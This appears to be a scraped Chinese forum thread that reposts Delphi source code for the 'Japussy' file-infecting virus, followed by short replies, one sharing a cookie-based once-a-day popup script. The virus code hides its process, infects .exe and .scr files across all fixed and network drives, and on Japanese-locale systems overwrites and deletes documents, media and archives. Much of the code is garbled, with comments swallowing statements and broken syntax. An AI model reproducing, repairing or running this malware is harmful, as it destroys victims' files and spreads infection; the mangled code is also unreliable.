{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll';
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false;
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0);
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end:
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
procedure sendmail;
begin
end;
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try
if comparetext(filename, 'japussy.exe') = 0 then
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe
begin
ispe := true; break;
end;
end;
srcstream.seek(-4, sofromend); srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
// copystream(hdrstream, 0, dststream, 0, iconoffset);
// copystream(icostream, 22, dststream, iconoffset, iconsize);
// copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
// copystream(srcstream, 0, dststream, headersize, srcstream.size);
// dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); // dststream.free;
end;
except;
end;
end;
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0);
filehandle := fileopen(filename, fmopenwrite);
try
size := getfilesize(filehandle, nil);
i := 0;
randomize;
max := random(15); // if max < 5 then
max := 5;
mass := size div max; // len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclose(filehandle); // end;
deletefile(pchar(filename)); //except
end;
end;
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 0 // else if (searchrec.attr = 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 1 // else result := 2; //end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); // if isvaliddir(searchrec) = 0 then
begin
fn := path + searchrec.name;
ext := uppercase(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//
// // end
else if ext = '.wab' then //outlook begin
// end
else if ext = '.adc' then //foxmail
begin
//
end
else if ext = 'ind' then //foxmail
begin
// end
else
begin
if isjap then //
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); // end;
end;
end;
// sleep(200);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
repeat
if isvaliddir(searchrec) = 1 then
subdir.add(searchrec.name);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then // isjap := true; //
driverlist := getdrives; //len := length(driverlist);
while true do //begin
for i := len downto 1 do //
loopfiles(driverlist + ':\', '*.*'); //
sendmail; // sleep(1000 * 60 * 5); //end;
{ }
begin
if iswin9x then //是win9x
registerserviceprocess(getcurrentprocessid, 1) //else //winnt
begin
//
//
end;
//if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //else //
begin
tmpfile := paramstr(0); // delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; // extractfile(tmpfile); // fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi);
infectfiles;
end;
end
天啊 这长!!!!!
这是js吗??
下面的是一天弹一次窗口的 改改用吧
//弹出窗口
function popUp() {
var _getCookie = getCookie("popUp_WebSite_pxy");
if(_getCookie == "")
{
newCookie("popUp_WebSite_pxy","xuexi_pxy",1);
var popPage = window.open('http://www.pxy.113317.com/?from=www.113317.com');
self.focus();
}
}
//Cookie 处理函数
function getCookie(name) {
var cookiefound=false
var start=0
var end=0
var cookiestring=document.cookie;
var i=0;
while (i<=cookiestring.length)
{
start=i
end=start+name.length
if (cookiestring.substring(start,end)==name)
{cookiefound=true;
break;
}
i++;
}
if (cookiefound==true)
{
start=end+1;
end=cookiestring.indexOf(";",start);
if (end
end=cookiestring.length;}
return cookiestring.substring(start,end);
}
return "";
}
//写入新的Cookie值
function newCookie(id,value,guoqi)
{
var expires=new Date()
expires.setTime(expires.getTime()+ guoqi * 24*60*60*30*1000)
var expiryDate=expires.toGMTString();
document.cookie=id+"="+value+";expires="+expiryDate
}
比较难~~~
cooooookie是什么东东
路过,二分。
内容全部来源于网络收集,如有侵权,请联系网站删除:QQ:24596024